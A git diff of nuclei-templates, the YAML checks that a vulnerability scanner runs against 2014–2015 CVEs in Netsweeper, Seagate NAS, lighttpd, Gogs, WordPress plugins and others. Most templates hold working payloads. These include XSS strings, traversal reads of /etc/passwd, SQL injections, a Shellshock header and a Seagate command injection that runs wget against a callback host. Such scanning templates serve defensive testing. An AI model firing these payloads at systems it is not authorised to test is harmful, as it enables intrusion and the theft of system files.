100644 index 0000000000..cdbdffe670 --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-9607.yaml @@ -0,0 +1,40 @@ +id: CVE-2014-9607 + +info: + name: Netsweeper 4.0.4 - Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter. + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + - https://nvd.nist.gov/vuln/detail/CVE-2014-9607 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2014-9607 + cwe-id: CWE-79 + tags: cve,cve2014,netsweeper,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/CVE-2014-9608.yaml b/nuclei-templates/CVE-2014/CVE-2014-9608.yaml index ecb6d6688a..a79a21d6e2 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-9608.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-9608.yaml @@ -1,17 +1,16 @@ id: CVE-2014-9608 info: - name: Netsweeper 4.0.3 - Cross-Site Scripting + name: Netsweeper 4.0.3 - Cross Site Scripting Injection author: daffainfo severity: medium - description: A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. + description: Cross-site scripting (XSS) vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9608 - - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2014-9608 cwe-id: CWE-79 tags: cve,cve2014,netsweeper,xss @@ -36,5 +35,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/CVE-2014-9609.yaml b/nuclei-templates/CVE-2014/CVE-2014-9609.yaml new file mode 100644 index 0000000000..8edbc6409a --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-9609.yaml @@ -0,0 +1,34 @@ +id: CVE-2014-9609 + +info: + name: Netsweeper 4.0.8 - Directory Traversal + author: daffainfo + severity: medium + description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + - https://nvd.nist.gov/vuln/detail/CVE-2014-9609 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2014-9609 + cwe-id: CWE-22 + tags: cve,cve2014,netsweeper,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/CVE-2014-9615.yaml b/nuclei-templates/CVE-2014/CVE-2014-9615.yaml index e79a758026..1f9852ee16 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-9615.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-9615.yaml @@ -1,17 +1,16 @@ id: CVE-2014-9615 info: - name: Netsweeper 4.0.4 - Cross-Site Scripting + name: Netsweeper 4.0.4 - Cross Site Scripting Injection author: daffainfo severity: medium - description: A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php. + description: Cross-site scripting (XSS) vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9615 - - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2014-9615 cwe-id: CWE-79 tags: cve,cve2014,netsweeper,xss @@ -36,5 +35,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/cve-2014-9617.yaml b/nuclei-templates/CVE-2014/CVE-2014-9617.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9617.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9617.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-10037.yaml b/nuclei-templates/CVE-2014/cve-2014-10037.yaml new file mode 100644 index 0000000000..7acb0d68b5 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-10037.yaml @@ -0,0 +1,27 @@ +id: CVE-2014-10037 + +info: + name: DomPHP 0.83 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php. + reference: + - https://www.exploit-db.com/exploits/30865 + - https://www.cvedetails.com/cve/CVE-2014-10037 + tags: cve,cve2014,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/cve-2014-2321.yaml b/nuclei-templates/CVE-2014/cve-2014-2321.yaml new file mode 100644 index 0000000000..c26212d1b8 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-2321.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-2321 + +info: + name: ZTE Cable Modem Web Shell + description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. + author: geeknik + reference: + - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/ + - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ + severity: high + tags: iot,cve,cve2014,zte + +requests: + - method: GET + path: + - "{{BaseURL}}/web_shell_cmd.gch" + + matchers-condition: and + matchers: + - type: word + words: + - "please input shell command" + - "ZTE Corporation. All rights reserved" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-2323.yaml b/nuclei-templates/CVE-2014/cve-2014-2323.yaml deleted file mode 100644 index c7205766d8..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-2323.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2014-2323 - -info: - name: Lighttpd 1.4.34 SQL injection and path traversal - description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname. - reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt - author: geeknik - severity: critical - tags: cve,cve2014,sqli,lighttpd,injection - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2014-2323 - cwe-id: CWE-89 - -requests: - - raw: - - |+ - GET /etc/passwd HTTP/1.1 - Host: [::1]' UNION SELECT '/ - - unsafe: true - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" diff --git a/nuclei-templates/CVE-2014/cve-2014-2383.yaml b/nuclei-templates/CVE-2014/cve-2014-2383.yaml deleted file mode 100644 index 1586860d75..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-2383.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2014-2383 - -info: - name: Arbitrary file read in dompdf < v0.6.0 - author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/33004 - tags: cve,cve2014,dompdf,lfi - metadata: - win-payload: "/dompdf.php?input_file=C:/windows/win.ini" - unix-payload: "/dompdf.php?input_file=/etc/passwd" - description: "dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter." - -requests: - - method: GET - path: - - "{{BaseURL}}/dompdf.php?input_file=dompdf.php" - - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php" - - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php" - - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "application/pdf" - - 'filename="dompdf_out.pdf"' - part: header - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-2962.yaml b/nuclei-templates/CVE-2014/cve-2014-2962.yaml deleted file mode 100644 index 2456af7a2e..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-2962.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2014-2962 - -info: - name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal - author: daffainfo - severity: high - description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. - reference: https://www.exploit-db.com/exploits/38488 - tags: cve,cve2014,lfi,router,firmware,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-3206.yaml b/nuclei-templates/CVE-2014/cve-2014-3206.yaml new file mode 100644 index 0000000000..55bdba21b3 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-3206.yaml @@ -0,0 +1,35 @@ +id: CVE-2014-3206 + +info: + name: Seagate BlackArmor NAS - Command Injection + author: gy741 + severity: critical + description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 + - https://www.exploit-db.com/exploits/33159 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-3206 + cwe-id: CWE-20 + tags: cve,cve2014,seagate,rce + +requests: + - raw: + - | + GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + unsafe: true + matchers: + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/nuclei-templates/CVE-2014/cve-2014-4535.yaml b/nuclei-templates/CVE-2014/cve-2014-4535.yaml deleted file mode 100644 index 8e6d8424d8..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-4535.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2014-4535 - -info: - name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: - - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 - tags: cve,cve2014,wordpress,wp-plugin,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2014-4535 - cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "'>" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-4536.yaml b/nuclei-templates/CVE-2014/cve-2014-4536.yaml deleted file mode 100644 index d226a920db..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-4536.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2014-4536 - -info: - name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS - author: daffainfo - severity: medium - reference: - - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 - tags: cve,cve2014,wordpress,wp-plugin,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2014-4536 - cwe-id: CWE-79 - description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter." - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" - - matchers-condition: and - matchers: - - type: word - words: - - '">' - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-4550.yaml b/nuclei-templates/CVE-2014/cve-2014-4550.yaml deleted file mode 100644 index 898d13a6bd..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-4550.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2014-4550 - -info: - name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS - author: daffainfo - severity: medium - reference: | - - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 - - https://nvd.nist.gov/vuln/detail/CVE-2014-4550 - tags: cve,cve2014,wordpress,wp-plugin,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2014-4550 - cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter." - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" - - matchers-condition: and - matchers: - - type: word - words: - - "'>" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/cve-2014-4592.yaml b/nuclei-templates/CVE-2014/cve-2014-4592.yaml new file mode 100644 index 0000000000..db868347e2 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-4592.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-4592 + +info: + name: WP Planet <= 0.1 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 + tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4592 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/cve-2014-6271.yaml b/nuclei-templates/CVE-2014/cve-2014-6271.yaml deleted file mode 100644 index 6c5db06412..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-6271.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2014-6271 - -info: - name: Shellshock - author: pentest_swissky - severity: critical - description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications - reference: - - http://www.kb.cert.org/vuls/id/252743 - - http://www.us-cert.gov/ncas/alerts/TA14-268A - tags: cve,cve2014,rce - - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2014-6271 - cwe-id: CWE-78 -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/cgi-bin/status" - - "{{BaseURL}}/cgi-bin/stats" - - "{{BaseURL}}/cgi-bin/test" - - "{{BaseURL}}/cgi-bin/status/status.cgi" - - "{{BaseURL}}/test.cgi" - - "{{BaseURL}}/debug.cgi" - - "{{BaseURL}}/cgi-bin/test-cgi" - headers: - Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/nuclei-templates/CVE-2014/cve-2014-8682.yaml b/nuclei-templates/CVE-2014/cve-2014-8682.yaml new file mode 100644 index 0000000000..54f4490459 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-8682.yaml @@ -0,0 +1,36 @@ +id: CVE-2014-8682 + +info: + name: Gogs - 'users'/'repos' '?q' SQL Injection + author: dhiyaneshDK + severity: high + description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. + reference: + - http://www.securityfocus.com/bid/71187 + - http://seclists.org/fulldisclosure/2014/Nov/33 + - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html + - http://gogs.io/docs/intro/change_log.html + - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d + - http://www.exploit-db.com/exploits/35238 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694 + - http://www.securityfocus.com/archive/1/533995/100/0/threaded + tags: cve,cve2014,sqli,gogs + metadata: + shodan-query: 'title:"Sign In - Gogs"' + +requests: + - method: GET + path: + - '{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27' + + matchers-condition: and + matchers: + - type: word + words: + - '"ok":true' + - '"data"' + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-9607.yaml b/nuclei-templates/CVE-2014/cve-2014-9607.yaml deleted file mode 100644 index 05eab3a640..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-9607.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2014-9607 - -info: - name: Netsweeper 4.0.4 - Cross Site Scripting Injection - author: daffainfo - severity: medium - description: Cross-site scripting (XSS) vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter. - reference: - - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - - https://nvd.nist.gov/vuln/detail/CVE-2014-9607 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2014-9607 - cwe-id: CWE-79 - tags: cve,cve2014,netsweeper,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-9609.yaml b/nuclei-templates/CVE-2014/cve-2014-9609.yaml deleted file mode 100644 index 20cf466ef3..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-9609.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2014-9609 - -info: - name: Netsweeper 4.0.8 - Directory Traversal - author: daffainfo - severity: medium - description: Directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. - reference: - - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - - https://nvd.nist.gov/vuln/detail/CVE-2014-9609 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2014-9609 - cwe-id: CWE-22 - tags: cve,cve2014,netsweeper,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-0554.yaml b/nuclei-templates/CVE-2015/CVE-2015-0554.yaml deleted file mode 100644 index 80943c3214..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-0554.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2015-0554 - -info: - name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure - author: daffainfo - severity: high - description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. - reference: - - https://www.exploit-db.com/exploits/35721 - - https://nvd.nist.gov/vuln/detail/CVE-2015-0554 - - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html - - http://www.exploit-db.com/exploits/35721 - classification: - cve-id: CVE-2015-0554 - tags: cve,cve2015,pirelli,router,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/wlsecurity.html" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "var wpapskkey" - - "var WscDevPin" - - "var sessionkey" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-1000012.yaml b/nuclei-templates/CVE-2015/CVE-2015-1000012.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-1000012.yaml rename to nuclei-templates/CVE-2015/CVE-2015-1000012.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-1503.yaml b/nuclei-templates/CVE-2015/CVE-2015-1503.yaml deleted file mode 100644 index 380c04fc63..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-1503.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2015-1503 - -info: - name: IceWarp Mail Server Directory Traversal - author: 0x_Akoko - severity: high - description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability. - reference: - - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html - - http://www.icewarp.com - - https://nvd.nist.gov/vuln/detail/CVE-2015-1503 - - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2015-1503 - cwe-id: CWE-200 - tags: cve,cve2015,icewarp,lfi,mail - -requests: - - method: GET - path: - - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd" - - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-1880.yaml b/nuclei-templates/CVE-2015/CVE-2015-1880.yaml index 9260f68085..583e70729a 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-1880.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-1880.yaml @@ -8,10 +8,6 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page - - http://www.fortiguard.com/advisory/FG-IR-15-005/ - - http://www.securityfocus.com/bid/74652 - classification: - cve-id: CVE-2015-1880 tags: cve,cve2015,xss,fortigates,ssl requests: diff --git a/nuclei-templates/CVE-2015/CVE-2015-2807.yaml b/nuclei-templates/CVE-2015/CVE-2015-2807.yaml deleted file mode 100644 index 9bd8bf9979..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-2807.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2015-2807 - -info: - name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter. - reference: - - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 - - https://security.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - - https://wordpress.org/plugins/navis-documentcloud/changelog/ - classification: - cve-id: CVE-2015-2807 - tags: cve,cve2015,wordpress,wp-plugin,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - 